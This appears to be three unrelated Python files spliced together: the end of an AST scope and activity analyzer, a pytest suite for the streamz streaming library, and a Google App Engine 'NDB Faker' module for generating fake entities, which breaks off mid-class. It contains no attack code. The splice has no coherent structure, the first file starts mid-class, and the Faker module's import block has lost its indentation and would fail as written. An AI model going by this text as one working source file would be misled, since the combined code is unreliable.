        node.annotation = self._process_annotation(node.annotation)
    self._exit_and_record_scope(node)
    return node
def visit_AugAssign(self, node):
    # Special rules for AugAssign. Here, the AST only shows the target as
    # written, when it is in fact also read.
    self._enter_scope(False)
    self._in_aug_assign = True
    node.target = self.visit(node.target)
    self._in_aug_assign = False
    node.op = self.visit(node.op)
    node.value = self.visit(node.value)
    self._exit_and_record_scope(node)
    return node
def visit_Delete(self, node):
    # del statement; tracked in its own statement scope.
    return self._process_statement(node)
def visit_Name(self, node):
    # Name nodes may carry an annotation field (gast attaches one for
    # function arguments); visit it in annotation mode first.
    if node.annotation:
        node.annotation = self._process_annotation(node.annotation)
    self._track_symbol(node)
    return node
def visit_alias(self, node):
    """Tracks the name bound by an import alias."""
    node = self.generic_visit(node)

    if node.asname is not None:
        bound_name = node.asname
    else:
        # Only the root name is a real symbol operation.
        bound_name = node.name.split('.')[0]

    qn = qual_names.QN(bound_name)
    self.scope.modified.add(qn)
    self.scope.bound.add(qn)
    return node
def visit_Attribute(self, node):
    node = self.generic_visit(node)
    if self._in_constructor and self._node_sets_self_attribute(node):
        # Inside __init__, writes to self.<attr> also mark `self` modified.
        self._track_symbol(node, composite_writes_alter_parent=True)
    else:
        self._track_symbol(node)
    return node
def visit_Subscript(self, node):
    node = self.generic_visit(node)
    # Subscript writes (e.g. a[b] = "value") are considered to modify
    # both the element itself (a[b]) and its parent (a).
    self._track_symbol(node)
    return node
def visit_Print(self, node):
    # Python 2 print statement; its values form an args scope.
    self._enter_scope(False)
    node.values = self.visit_block(node.values)
    node_scope = self._exit_and_record_scope(node)
    anno.setanno(node, NodeAnno.ARGS_SCOPE, node_scope)
    return node
def visit_Assert(self, node):
    # assert statement; tracked in its own statement scope.
    return self._process_statement(node)
def visit_Call(self, node):
    self._enter_scope(False)
    node.args = self.visit_block(node.args)
    node.keywords = self.visit_block(node.keywords)
    # TODO(mdan): Account starargs, kwargs
    self._exit_and_record_scope(node, tag=NodeAnno.ARGS_SCOPE)
    # The function itself is visited outside the args scope, so reads of
    # its name land in the surrounding scope.
    node.func = self.visit(node.func)
    return node
def _process_block_node(self, node, block, scope_name):
    # Visits `block` (a list of statements under `node`) in its own
    # non-isolated scope, recorded on `node` under `scope_name`.
    self._enter_scope(False)
    block = self.visit_block(block)
    self._exit_and_record_scope(node, tag=scope_name)
    return node
def _process_parallel_blocks(self, parent, children):
    """Visits sibling blocks that must each see the same initial scope.

    Args:
      parent: the AST node owning the blocks.
      children: list of (block, scope_tag) pairs.
    """
    # Because the scopes are not isolated, processing any child block
    # modifies the parent state causing the other child blocks to be
    # processed incorrectly. So we need to checkpoint the parent scope so that
    # each child sees the same context.
    before_parent = Scope.copy_of(self.scope)
    after_children = []
    for child, scope_name in children:
        self.scope.copy_from(before_parent)
        parent = self._process_block_node(parent, child, scope_name)
        after_child = Scope.copy_of(self.scope)
        after_children.append(after_child)
    # Fold the activity of every child back into the live scope.
    for after_child in after_children:
        self.scope.merge_from(after_child)
    return parent
def _process_comprehension(self,
                           node,
                           is_list_comp=False,
                           is_dict_comp=False):
    # Shared handler for comprehensions and generator expressions; the
    # _Comprehension frame suppresses tracking of comprehension-local
    # targets (see _track_symbol).
    with self.state[_Comprehension] as comprehension_:
        comprehension_.is_list_comp = is_list_comp
        # Note: it's important to visit the generators first to properly account
        # for the variables local to these generators. Example: `x` is local to
        # the expression `z for x in y for z in x`.
        node.generators = self.visit_block(node.generators)
        if is_dict_comp:
            node.key = self.visit(node.key)
            node.value = self.visit(node.value)
        else:
            node.elt = self.visit(node.elt)
        return node
def visit_comprehension(self, node):
    # It is important to visit children in this order so that the reads to
    # the target name are appropriately ignored.
    node.iter = self.visit(node.iter)
    node.target = self.visit(node.target)
    return self.generic_visit(node)
def visit_DictComp(self, node):
    # Dict comprehensions have key/value instead of elt.
    return self._process_comprehension(node, is_dict_comp=True)
def visit_ListComp(self, node):
    # List comprehensions are flagged because their targets leak in Python 2.
    return self._process_comprehension(node, is_list_comp=True)
def visit_SetComp(self, node):
    # Set comprehensions take the default handling.
    return self._process_comprehension(node)
def visit_GeneratorExp(self, node):
    # Generator expressions take the default handling.
    return self._process_comprehension(node)
def visit_ClassDef(self, node):
    """Annotate a ClassDef with its definition scope and visit its body."""
    with self.state[_FunctionOrClass] as fn:
        fn.node = node
        # The ClassDef node itself has a Scope object that tracks the creation
        # of its name, along with the usage of any decorator accompanying it.
        self._enter_scope(False)
        node.decorator_list = self.visit_block(node.decorator_list)
        # The class name is both modified and bound in the defining context.
        self.scope.modified.add(qual_names.QN(node.name))
        self.scope.bound.add(qual_names.QN(node.name))
        node.bases = self.visit_block(node.bases)
        node.keywords = self.visit_block(node.keywords)
        self._exit_and_record_scope(node)
        # A separate Scope tracks the actual class definition.
        self._enter_scope(True)
        node = self.generic_visit(node)
        self._exit_scope()
        return node
def _visit_node_list(self, nodes):
    """Visit every node in `nodes`; None placeholders pass through unchanged."""
    visited = []
    for child in nodes:
        visited.append(None if child is None else self.visit(child))
    return visited
def _visit_arg_annotations(self, node):
    """Visit argument defaults and annotations in the defining context.

    Defaults are visited as ordinary expressions; declarations are visited
    with `_track_annotations_only` set so only their annotations register.

    Args:
      node: an AST node with an `args` attribute (FunctionDef/Lambda).
    Returns:
      The (possibly mutated) node.
    """
    node.args.kw_defaults = self._visit_node_list(node.args.kw_defaults)
    node.args.defaults = self._visit_node_list(node.args.defaults)
    self._track_annotations_only = True
    try:
        node = self._visit_arg_declarations(node)
    finally:
        # Restore the flag even if visiting raises; otherwise a failed visit
        # would leave the analyzer stuck in annotations-only mode.
        self._track_annotations_only = False
    return node
def _visit_arg_declarations(self, node):
    """Visit all argument declarations: posonly, regular, *args, kwonly, **kwargs."""
    node.args.posonlyargs = self._visit_node_list(node.args.posonlyargs)
    node.args.args = self._visit_node_list(node.args.args)
    if node.args.vararg is not None:
        node.args.vararg = self.visit(node.args.vararg)
    node.args.kwonlyargs = self._visit_node_list(node.args.kwonlyargs)
    if node.args.kwarg is not None:
        node.args.kwarg = self.visit(node.args.kwarg)
    return node
def visit_FunctionDef(self, node):
    """Annotate a FunctionDef with its defining, args and body scopes."""
    with self.state[_FunctionOrClass] as fn:
        fn.node = node
        # The FunctionDef node itself has a Scope object that tracks the creation
        # of its name, along with the usage of any decorator accompanying it.
        self._enter_scope(False)
        node.decorator_list = self.visit_block(node.decorator_list)
        if node.returns:
            node.returns = self._process_annotation(node.returns)
        # Argument annotations (including defaults) affect the defining context.
        node = self._visit_arg_annotations(node)
        function_name = qual_names.QN(node.name)
        self.scope.modified.add(function_name)
        self.scope.bound.add(function_name)
        self._exit_and_record_scope(node)
        # A separate Scope tracks the actual function definition.
        self._enter_scope(True)
        # Keep a separate scope for the arguments node, which is used in the CFG.
        self._enter_scope(False)
        # Arg declarations only affect the function itself, and have no effect
        # in the defining context whatsoever.
        node = self._visit_arg_declarations(node)
        self._exit_and_record_scope(node.args)
        # Track the body separately. This is for compatibility reasons, it may not
        # be strictly needed.
        self._enter_scope(False)
        node.body = self.visit_block(node.body)
        self._exit_and_record_scope(node, NodeAnno.BODY_SCOPE)
        self._exit_and_record_scope(node, NodeAnno.ARGS_AND_BODY_SCOPE)
        return node
def visit_Lambda(self, node):
    """Annotate a Lambda with its defining, args and body scopes."""
    # Lambda nodes are treated in roughly the same way as FunctionDef nodes.
    with self.state[_FunctionOrClass] as fn:
        fn.node = node
        # The Lambda node itself has a Scope object that tracks the creation
        # of its name, along with the usage of any decorator accompanying it.
        self._enter_scope(False)
        node = self._visit_arg_annotations(node)
        self._exit_and_record_scope(node)
        # A separate Scope tracks the actual function definition.
        self._enter_scope(True)
        # Keep a separate scope for the arguments node, which is used in the CFG.
        self._enter_scope(False)
        node = self._visit_arg_declarations(node)
        self._exit_and_record_scope(node.args)
        # Track the body separately. This is for compatibility reasons, it may not
        # be strictly needed.
        # TODO(mdan): Do remove it, it's confusing.
        self._enter_scope(False)
        # A lambda's body is a single expression, not a statement block.
        node.body = self.visit(node.body)
        self._exit_and_record_scope(node, NodeAnno.BODY_SCOPE)
        self._exit_and_record_scope(node, NodeAnno.ARGS_AND_BODY_SCOPE)
        return node
def visit_With(self, node):
    """A With statement gets a single body scope covering items and body."""
    self._enter_scope(False)
    node = self.generic_visit(node)
    self._exit_and_record_scope(node, NodeAnno.BODY_SCOPE)
    return node
def visit_withitem(self, node):
    """Each `with` item is treated as an ordinary statement."""
    return self._process_statement(node)
def visit_If(self, node):
    """Record the test's scope, then process body/orelse as parallel blocks."""
    self._enter_scope(False)
    node.test = self.visit(node.test)
    node_scope = self._exit_and_record_scope(node.test)
    anno.setanno(node, NodeAnno.COND_SCOPE, node_scope)
    # body and orelse must both be visited from the post-test state.
    node = self._process_parallel_blocks(node,
                                         ((node.body, NodeAnno.BODY_SCOPE),
                                          (node.orelse, NodeAnno.ORELSE_SCOPE)))
    return node
def visit_For(self, node):
    """Record iterate/body/orelse scopes of a For loop."""
    self._enter_scope(False)
    node.target = self.visit(node.target)
    node.iter = self.visit(node.iter)
    self._exit_and_record_scope(node.iter)
    self._enter_scope(False)
    # Re-visit the target so its modification registers in the iterate scope;
    # the return value is intentionally discarded here.
    self.visit(node.target)
    if anno.hasanno(node, anno.Basic.EXTRA_LOOP_TEST):
        self._process_statement(anno.getanno(node, anno.Basic.EXTRA_LOOP_TEST))
    self._exit_and_record_scope(node, tag=NodeAnno.ITERATE_SCOPE)
    node = self._process_parallel_blocks(node,
                                         ((node.body, NodeAnno.BODY_SCOPE),
                                          (node.orelse, NodeAnno.ORELSE_SCOPE)))
    return node
def visit_While(self, node):
    """Record the loop test's scope, then body/orelse as parallel blocks."""
    self._enter_scope(False)
    node.test = self.visit(node.test)
    node_scope = self._exit_and_record_scope(node.test)
    anno.setanno(node, NodeAnno.COND_SCOPE, node_scope)
    node = self._process_parallel_blocks(node,
                                         ((node.body, NodeAnno.BODY_SCOPE),
                                          (node.orelse, NodeAnno.ORELSE_SCOPE)))
    return node
def visit_ExceptHandler(self, node):
    """Visit an except clause, isolating the exception variable's name."""
    self._enter_scope(False)
    # try/except oddity: as expected, it leaks any names you defined inside the
    # except block, but not the name of the exception variable.
    if node.name is not None:
        self.scope.isolated_names.add(anno.getanno(node.name, anno.Basic.QN))
    node = self.generic_visit(node)
    self._exit_scope()
    return node
def resolve(node, context, parent_scope=None):
    """Annotate `node` (in place) with activity/scope information."""
    return ActivityAnalyzer(context, parent_scope).visit(node)
| |
from datetime import timedelta
import operator
from operator import add
from time import time
import pytest
from tornado import gen
from tornado.queues import Queue
from tornado.ioloop import IOLoop
import streamz as sz
from ..core import Stream
from streamz.sources import sink_to_file, Counter
from streamz.utils_test import inc, double, gen_test, tmpfile
def test_basic():
    """Two map branches off one source; scan accumulates one of them."""
    stream = Stream()
    incremented = stream.map(inc)
    doubled = stream.map(double)
    running = incremented.scan(add)
    totals = running.sink_to_list()
    doubles = doubled.sink_to_list()
    for value in range(4):
        stream.emit(value)
    assert totals == [1, 3, 6, 10]
    assert doubles == [0, 2, 4, 6]
def test_scan():
    """scan with returns_state=True emits the running total."""
    stream = Stream()
    def accumulate(state, item):
        state = state + item
        return state, state
    totals = stream.scan(accumulate, returns_state=True).sink_to_list()
    for value in range(3):
        stream.emit(value)
    assert totals == [0, 1, 3]
def test_filter():
    """Only elements matching the predicate pass through filter."""
    stream = Stream()
    evens = stream.filter(lambda v: v % 2 == 0).sink_to_list()
    for value in range(10):
        stream.emit(value)
    assert evens == [0, 2, 4, 6, 8]
def test_map():
    """map forwards extra keyword arguments to the mapped function."""
    def add(x=0, y=0):
        return x + y
    stream = Stream()
    out = stream.map(add, y=10).sink_to_list()
    stream.emit(1)
    assert out[0] == 11
def test_map_args():
    """map forwards extra positional arguments to the mapped function."""
    stream = Stream()
    out = stream.map(operator.add, 10).sink_to_list()
    stream.emit(1)
    assert out == [11]
def test_remove():
    """remove drops elements matching the predicate (inverse of filter)."""
    stream = Stream()
    odds = stream.remove(lambda v: v % 2 == 0).sink_to_list()
    for value in range(10):
        stream.emit(value)
    assert odds == [1, 3, 5, 7, 9]
def test_partition():
    """partition groups every n consecutive elements into a tuple."""
    stream = Stream()
    pairs = stream.partition(2).sink_to_list()
    for value in range(10):
        stream.emit(value)
    assert pairs == [(0, 1), (2, 3), (4, 5), (6, 7), (8, 9)]
def test_sliding_window():
    """sliding_window emits overlapping tuples of the last n elements."""
    stream = Stream()
    windows = stream.sliding_window(2).sink_to_list()
    for value in range(10):
        stream.emit(value)
    assert windows == [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5),
                       (5, 6), (6, 7), (7, 8), (8, 9)]
@gen_test()
def test_backpressure():
    """A slow consumer on a bounded queue throttles upstream emits."""
    queue = Queue(maxsize=2)
    stream = Stream()
    stream.map(inc).scan(add, start=0).sink(queue.put)
    @gen.coroutine
    def drain():
        while True:
            yield queue.get()
            yield gen.sleep(0.1)
    IOLoop.current().add_callback(drain)
    began = time()
    for value in range(5):
        yield stream.emit(value)
    ended = time()
    assert ended - began >= 0.2
@gen_test()
def test_timed_window():
    """timed_window batches the elements received within each interval."""
    stream = Stream()
    windowed = stream.timed_window(0.01)
    batches = windowed.sink_to_list()
    for value in range(10):
        yield stream.emit(value)
        yield gen.sleep(0.004)
    yield gen.sleep(windowed.interval)
    assert batches
    assert sum(batches, []) == list(range(10))
    assert all(len(batch) <= 3 for batch in batches)
    assert any(len(batch) >= 2 for batch in batches)
    yield gen.sleep(0.1)
    assert not batches[-1]
@gen_test()
def test_timed_window_backpressure():
    """timed_window respects downstream backpressure from a bounded queue."""
    queue = Queue(maxsize=1)
    stream = Stream()
    stream.timed_window(0.01).sink(queue.put)
    @gen.coroutine
    def drain():
        while True:
            yield queue.get()
            yield gen.sleep(0.1)
    IOLoop.current().add_callback(drain)
    began = time()
    for value in range(5):
        yield stream.emit(value)
        yield gen.sleep(0.01)
    ended = time()
    assert ended - began > 0.2
def test_sink_to_file():
    """sink_to_file writes one line per emitted element."""
    with tmpfile() as path:
        stream = Stream()
        with sink_to_file(path, stream):
            stream.emit('a')
            stream.emit('b')
        with open(path) as handle:
            contents = handle.read()
        assert contents == 'a\nb\n'
@gen_test()
def test_counter():
    """Counter emits periodically on its own."""
    counter = Counter(interval=0.01)
    collected = counter.sink_to_list()
    yield gen.sleep(0.1)
    assert collected
@gen_test()
def test_rate_limit():
    """rate_limit spaces out emits, delaying the producer."""
    stream = Stream()
    collected = stream.rate_limit(0.05).sink_to_list()
    began = time()
    for value in range(5):
        yield stream.emit(value)
    ended = time()
    assert ended - began > 0.2
    assert len(collected) == 5
@gen_test()
def test_delay():
    """delay holds each element for the given amount of time."""
    stream = Stream()
    collected = stream.delay(0.02).sink_to_list()
    for value in range(5):
        yield stream.emit(value)
    assert not collected
    yield gen.sleep(0.04)
    assert len(collected) < 5
    yield gen.sleep(0.1)
    assert len(collected) == 5
@gen_test()
def test_buffer():
    """buffer decouples a fast producer from a rate-limited consumer."""
    stream = Stream()
    collected = stream.map(inc).buffer(10).map(inc).rate_limit(0.05).sink_to_list()
    began = time()
    for value in range(10):
        yield stream.emit(value)
    ended = time()
    assert ended - began < 0.01
    assert not collected
    began = time()
    for value in range(5):
        yield stream.emit(value)
    ended = time()
    assert collected
    assert ended - began > 0.04
def test_zip():
    """zip pairs elements across streams in arrival order."""
    left = Stream()
    right = Stream()
    zipped = sz.zip(left, right)
    pairs = zipped.sink_to_list()
    left.emit(1)
    right.emit('a')
    left.emit(2)
    right.emit('b')
    assert pairs == [(1, 'a'), (2, 'b')]
    third = Stream()
    # zip is also available as a Stream method, and works across 3 streams.
    zipped3 = left.zip(right, third)
    triples = zipped3.sink_to_list()
    left.emit(1)
    right.emit(2)
    third.emit(3)
    assert triples == [(1, 2, 3)]
def test_combine_latest():
    """combine_latest emits the latest value seen on each upstream."""
    left = Stream()
    right = Stream()
    combined = left.combine_latest(right)
    combined_both = left.combine_latest(right, emit_on=[left, right])
    out = combined.sink_to_list()
    out_both = combined_both.sink_to_list()
    left.emit(1)
    left.emit(2)
    right.emit('a')
    left.emit(3)
    right.emit('b')
    assert out == [(2, 'a'), (3, 'a'), (3, 'b')]
    assert out_both == [(2, 'a'), (3, 'a'), (3, 'b')]
def test_combine_latest_emit_on():
    """With emit_on set to one stream, only its events trigger output."""
    left = Stream()
    right = Stream()
    combined = left.combine_latest(right, emit_on=left)
    out = combined.sink_to_list()
    left.emit(1)
    right.emit('a')
    left.emit(2)
    left.emit(3)
    right.emit('b')
    left.emit(4)
    assert out == [(2, 'a'), (3, 'a'), (4, 'b')]
def test_combine_latest_emit_on_stream():
    """emit_on also accepts an upstream index instead of a stream object."""
    left = Stream()
    right = Stream()
    combined = left.combine_latest(right, emit_on=0)
    out = combined.sink_to_list()
    left.emit(1)
    right.emit('a')
    left.emit(2)
    left.emit(3)
    right.emit('b')
    left.emit(4)
    assert out == [(2, 'a'), (3, 'a'), (4, 'b')]
@gen_test()
def test_zip_timeout():
    """zip with a bounded buffer blocks the producer until a pair forms."""
    left = Stream()
    right = Stream()
    zipped = sz.zip(left, right, maxsize=2)
    pairs = zipped.sink_to_list()
    left.emit(1)
    left.emit(2)
    pending = left.emit(3)
    with pytest.raises(gen.TimeoutError):
        yield gen.with_timeout(timedelta(seconds=0.01), pending)
    right.emit('a')
    yield pending
    assert pairs == [(1, 'a')]
def test_frequencies():
    """frequencies maintains a running count of each element."""
    stream = Stream()
    counts = stream.frequencies().sink_to_list()
    stream.emit('a')
    stream.emit('b')
    stream.emit('a')
    assert counts[-1] == {'a': 2, 'b': 1}
def test_concat():
    """concat flattens emitted sequences into individual elements."""
    stream = Stream()
    flattened = stream.concat().sink_to_list()
    stream.emit([1, 2, 3])
    stream.emit([4, 5])
    stream.emit([6, 7, 8])
    assert flattened == [1, 2, 3, 4, 5, 6, 7, 8]
def test_unique():
    """unique suppresses elements that were seen before."""
    stream = Stream()
    seen = stream.unique().sink_to_list()
    stream.emit(1)
    stream.emit(2)
    stream.emit(1)
    assert seen == [1, 2]
def test_unique_key():
    """unique can deduplicate on a derived key with limited history."""
    stream = Stream()
    seen = stream.unique(key=lambda v: v % 2, history=1).sink_to_list()
    stream.emit(1)
    stream.emit(2)
    stream.emit(4)
    stream.emit(6)
    stream.emit(3)
    assert seen == [1, 2, 3]
def test_unique_history():
    """With history=n, only the n most recent elements are deduplicated."""
    stream = Stream()
    deduped = stream.unique(history=2)
    seen = deduped.sink_to_list()
    stream.emit(1)
    stream.emit(2)
    stream.emit(1)
    stream.emit(2)
    stream.emit(1)
    stream.emit(2)
    assert seen == [1, 2]
    stream.emit(3)
    stream.emit(2)
    assert seen == [1, 2, 3]
    stream.emit(1)
    assert seen == [1, 2, 3, 1]
def test_union():
    """union merges several streams in arrival order."""
    first = Stream()
    second = Stream()
    third = Stream()
    merged = first.union(second, third).sink_to_list()
    first.emit(1)
    assert merged == [1]
    second.emit(2)
    assert merged == [1, 2]
    first.emit(3)
    assert merged == [1, 2, 3]
    third.emit(4)
    assert merged == [1, 2, 3, 4]
def test_collect():
    """collect buffers elements until flush() emits them as one tuple."""
    data_stream = Stream()
    flush_stream = Stream()
    collector = data_stream.collect()
    batches = collector.sink_to_list()
    flush_stream.sink(collector.flush)
    data_stream.emit(1)
    data_stream.emit(2)
    assert batches == []
    flush_stream.emit('anything')  # flushes collector
    assert batches == [(1, 2)]
    flush_stream.emit('anything')
    assert batches == [(1, 2), ()]
    data_stream.emit(3)
    assert batches == [(1, 2), ()]
    flush_stream.emit('anything')
    assert batches == [(1, 2), (), (3,)]
def test_map_str():
    """The repr of a map node includes the mapped function's name."""
    def add(x=0, y=0):
        return x + y
    stream = Stream()
    node = stream.map(add, y=10)
    assert str(node) == '<map; func=add>'
def test_filter_str():
    """The repr of a filter node includes the predicate's name."""
    def add(x=0, y=0):
        return x + y
    stream = Stream()
    node = stream.filter(add)
    assert str(node) == '<filter; predicate=add>'
def test_timed_window_str():
    """The repr of a timed_window node includes its interval."""
    stream = Stream()
    node = stream.timed_window(.05)
    assert str(node) == '<timed_window; interval=0.05>'
def test_partition_str():
    """The repr of a partition node includes its group size."""
    stream = Stream()
    node = stream.partition(2)
    assert str(node) == '<partition; n=2>'
def test_stream_name_str():
    """A custom stream_name shows up in the stream's repr."""
    stream = Stream(stream_name='this is not a stream')
    assert str(stream) == '<this is not a stream; Stream>'
def test_zip_latest():
    """zip_latest pairs each left element with the latest right value."""
    left = Stream()
    right = Stream()
    zipped = left.zip_latest(right)
    combined = left.combine_latest(right, emit_on=left)
    out_zip = zipped.sink_to_list()
    out_combined = combined.sink_to_list()
    left.emit(1)
    left.emit(2)
    right.emit('a')
    right.emit('b')
    left.emit(3)
    assert out_zip == [(1, 'a'), (2, 'a'), (3, 'b')]
    assert out_combined == [(3, 'b')]
def test_zip_latest_reverse():
    """zip_latest also works when the lossy stream emits first."""
    left = Stream()
    right = Stream()
    zipped = left.zip_latest(right)
    out = zipped.sink_to_list()
    right.emit('a')
    left.emit(1)
    left.emit(2)
    left.emit(3)
    right.emit('b')
    left.emit(4)
    assert out == [(1, 'a'), (2, 'a'), (3, 'a'), (4, 'b')]
def test_triple_zip_latest():
    """zip_latest with three upstreams waits for all before emitting."""
    from streamz.core import Stream
    first = Stream()
    second = Stream()
    third = Stream()
    zipped = first.zip_latest(second, third)
    out = zipped.sink_to_list()
    first.emit(1)
    second.emit('I')
    second.emit("II")
    first.emit(2)
    second.emit("III")
    third.emit('a')
    third.emit('b')
    first.emit(3)
    assert out == [(1, 'III', 'a'), (2, 'III', 'a'), (3, 'III', 'b')]
def test_connect():
    """connect attaches an upstream to an already-built pipeline."""
    downstream = Stream()
    # connect assumes this default behaviour of stream initialization
    assert downstream.parents == []
    assert downstream.children == [None]
    # initialize the second stream to connect to
    upstream = Stream()
    mapped = downstream.map(lambda v: v + 1)
    collected = list()
    mapped = mapped.map(collected.append)
    upstream.connect(downstream)
    upstream.emit(2)
    upstream.emit(4)
    assert collected == [3, 5]
| |
# -*- coding: utf-8 -*-
"""
NDB Faker
~~~~~~~~~
NDB Model & Properties for creating entities with fake data.
:license: MIT License, see LICENSE for more details.
:documentation: See README.md for documentation.
"""
__version__ = '1.0'
from google.appengine.ext import ndb
from google.appengine.api import users
import datetime
import hashlib
import random
import uuid
try:
from faker import Faker, numerify, patterns
except ImportError:
raise RuntimeError(
'Faker module required: https://github.com/deepthawtz/faker\n\
This package includes the Faker module as git submodule.\n\
Simply swap the inner "faker" folder with the outer "faker" folder.')
# --------------------------------------------------------------------
# Faker
# --------------------------------------------------------------------
class Faker(Faker):
    """Subclass of the bundled Faker adding app-specific fake generators."""
    # Aliases to upstream methods under more conventional names.
    phone_number = Faker.phonenumber
    address = Faker.street_address
    def zip(self):
        """Fake 5-digit US ZIP code as an int."""
        return int(numerify("#####"))
    def ssn(self):
        """Fake SSN in ###-##-#### form.

        Bug fix: the serial group previously used five '#' placeholders,
        producing 10-digit values; a US SSN has exactly 9 digits (3-2-4).
        """
        return numerify("###-##-####")
    def website(self):
        """Fake http URL built from a fake company name."""
        return 'http://%s.%s' % (patterns.COMPANY_NAME().lower().replace(' ', '-'),
                                 random.choice(['com','net','org']))
    def guid(self):
        """Random UUID4 as a string."""
        return str(uuid.uuid4())
    def md5(self):
        """Hex MD5 digest of a random float (not for security use)."""
        return hashlib.md5(str(random.random())).hexdigest()
    def sha1(self):
        """Hex SHA1 digest of a random float (not for security use)."""
        return hashlib.sha1(str(random.random())).hexdigest()
    def caption(self):
        """Short text: the first 64 characters of a lorem string."""
        return self.lorem()[0:64]
    def latitude(self):
        """Random latitude in [-90, 90], rounded to 2 decimals."""
        geo = (random.randint(-180000000, 180000000) / 1000000.0) / 2
        return float('%0.2f' % geo)
    def longitude(self):
        """Random longitude in [-180, 180], rounded to 2 decimals."""
        geo = random.randint(-180000000, 180000000) / 1000000.0
        return float('%0.2f' % geo)
    def coordinates(self):
        """Random ndb.GeoPt built from latitude()/longitude()."""
        return ndb.GeoPt('%f,%f' % (self.latitude(), self.longitude()))
    def profile(self):
        """Dict of common fake profile fields."""
        return dict(
            first_name = self.first_name(),
            last_name = self.last_name(),
            username = self.username(),
            email = self.email(),
            full_address = self.full_address(),
            phone_number = self.phone_number(),
        )
    def user(self):
        """Fake App Engine users.User with a fake email."""
        return users.User(self.email())
    def chance(self):
        """Random boolean (50/50)."""
        return random.randint(1, 100) <= 50
    def integer(self):
        """Random int in [1, 1000000]."""
        return random.randint(1, 1000000)
    def float(self):
        """Random float in [1, 10000] (triangular distribution)."""
        return random.triangular(1, 10000)
    def now(self):
        """Current datetime."""
        return datetime.datetime.now()
    def today(self):
        """Current date."""
        return datetime.date.today()
    def timestamp(self):
        """Current time of day."""
        return datetime.datetime.now().time()
    def key(self):
        """Random ndb.Key of kind 'Model'."""
        return ndb.Key('Model', random.randint(1, 100000))
# --------------------------------------------------------------------
# Model
# --------------------------------------------------------------------
class Model(ndb.Model):
    """ndb.Model that owns a Faker instance for generating fake entities."""
    def __init__(self, *args, **kwds):
        # Each entity carries its own Faker used by the fake properties.
        self._faker = Faker()
        super(Model, self).__init__(*args, **kwds)
    @classmethod
    def create(cls, **values):
        """Instantiate, persist and return a single entity."""
        entity = cls(**values)
        entity.put()
        return entity
    @classmethod
    def generate(cls, count):
        """Create and persist `count` entities, returned as a list."""
        return [cls.create() for _ in xrange(count)]
# --------------------------------------------------------------------
# Base Property
# --------------------------------------------------------------------
class Property(ndb.Property):
    """Base property that fills in fake values right before a put()."""
    def __init__(self, length=1, **kwargs):
        # `length` controls how many fake values a repeated property gets.
        try:
            self._length = int(length)
        except (ValueError, TypeError):
            raise ValueError("length must be an integer received %r" % length)
        super(Property, self).__init__(**kwargs)
    def _get_fake_value(self, entity):
        """Subclasses return one fake value for `entity`."""
        raise NotImplementedError()
    def _prepare_for_put(self, entity):
        # Only fabricate a value when the user did not set one explicitly.
        if not self._has_value(entity):
            value = self._get_user_value(entity)
            if not value:
                if self._repeated:
                    value = [self._get_fake_value(entity) for x in xrange(self._length)]
                else:
                    value = self._get_fake_value(entity)
                self._store_value(entity, value)
# --------------------------------------------------------------------
# Fake Property
# --------------------------------------------------------------------
class FakeProperty(Property):
    """Property whose fake value comes from a named Faker method."""
    # Name of the Faker method to use; falls back to the property's own
    # name, then to _get_fallback_value().
    _fake = None
    def __init__(self, fake=None, **kwargs):
        if fake is not None:
            # Validate the method name against the Faker class up front.
            try:
                getattr(Faker, fake)
            except (TypeError, AttributeError):
                raise ValueError("fake must be a valid method of Faker class received %s" % str(fake))
            self._fake = fake
        super(FakeProperty, self).__init__(**kwargs)
    def _get_fake_value(self, entity):
        """Return a fake value via the configured or name-matched Faker method."""
        if self._fake:
            return getattr(entity._faker, self._fake)()
        try:
            return getattr(entity._faker, self._name)()
        except AttributeError:
            return self._get_fallback_value(entity)
    def _get_fallback_value(self, entity):
        """Subclasses supply a type-appropriate default fake value."""
        raise NotImplementedError()
# --------------------------------------------------------------------
# Integer Property
# --------------------------------------------------------------------
class IntegerProperty(FakeProperty, ndb.IntegerProperty):
    """Integer property; falls back to a random int."""
    def _get_fallback_value(self, entity):
        return entity._faker.integer()
# --------------------------------------------------------------------
# Float Property
# --------------------------------------------------------------------
class FloatProperty(FakeProperty, ndb.FloatProperty):
    """Float property; falls back to a random float."""
    def _get_fallback_value(self, entity):
        return entity._faker.float()
# --------------------------------------------------------------------
# Boolean Property
# --------------------------------------------------------------------
class BooleanProperty(FakeProperty, ndb.BooleanProperty):
    """Boolean property; falls back to a coin flip."""
    def _get_fallback_value(self, entity):
        return entity._faker.chance()
# --------------------------------------------------------------------
# Text Property
# --------------------------------------------------------------------
class TextProperty(FakeProperty, ndb.TextProperty):
    """Text property; falls back to lorem text."""
    def _get_fallback_value(self, entity):
        return entity._faker.lorem()
# --------------------------------------------------------------------
# String Property
# --------------------------------------------------------------------
class StringProperty(FakeProperty, ndb.StringProperty):
    """String property; falls back to a short caption."""
    def _get_fallback_value(self, entity):
        return entity._faker.caption()
# --------------------------------------------------------------------
# Generic Property
# --------------------------------------------------------------------
class GenericProperty(FakeProperty, ndb.GenericProperty):
    """Generic property; falls back to a short caption."""
    def _get_fallback_value(self, entity):
        return entity._faker.caption()
# --------------------------------------------------------------------
# Datetime Property
# --------------------------------------------------------------------
class DateTimeProperty(FakeProperty, ndb.DateTimeProperty):
    """Datetime property; falls back to the current datetime."""
    def _get_fallback_value(self, entity):
        return entity._faker.now()
# --------------------------------------------------------------------
# Date Property
# --------------------------------------------------------------------
class DateProperty(FakeProperty, ndb.DateProperty):
    """Date property; falls back to today's date."""
    def _get_fallback_value(self, entity):
        return entity._faker.today()
# --------------------------------------------------------------------
# Time Property
# --------------------------------------------------------------------
class TimeProperty(FakeProperty, ndb.TimeProperty):
    """Time property; falls back to the current time of day."""
    def _get_fallback_value(self, entity):
        return entity._faker.timestamp()
# --------------------------------------------------------------------
# GeoPt Property
# --------------------------------------------------------------------
class GeoPtProperty(FakeProperty, ndb.GeoPtProperty):
    """GeoPt property; falls back to random coordinates."""
    def _get_fallback_value(self, entity):
        return entity._faker.coordinates()
# --------------------------------------------------------------------
# Key Property
# --------------------------------------------------------------------
class KeyProperty(FakeProperty, ndb.KeyProperty):
    """Key property; falls back to a random ndb.Key."""
    def _get_fallback_value(self, entity):
        return entity._faker.key()
# --------------------------------------------------------------------
# User Property
# --------------------------------------------------------------------
class UserProperty(FakeProperty, ndb.UserProperty):
    """User property; falls back to a fake App Engine user."""
    def _get_fallback_value(self, entity):
        return entity._faker.user()
# --------------------------------------------------------------------
# Json Property
# --------------------------------------------------------------------
class JsonProperty(FakeProperty, ndb.JsonProperty):
    """JSON property; falls back to a fake profile dict."""
    def _get_fallback_value(self, entity):
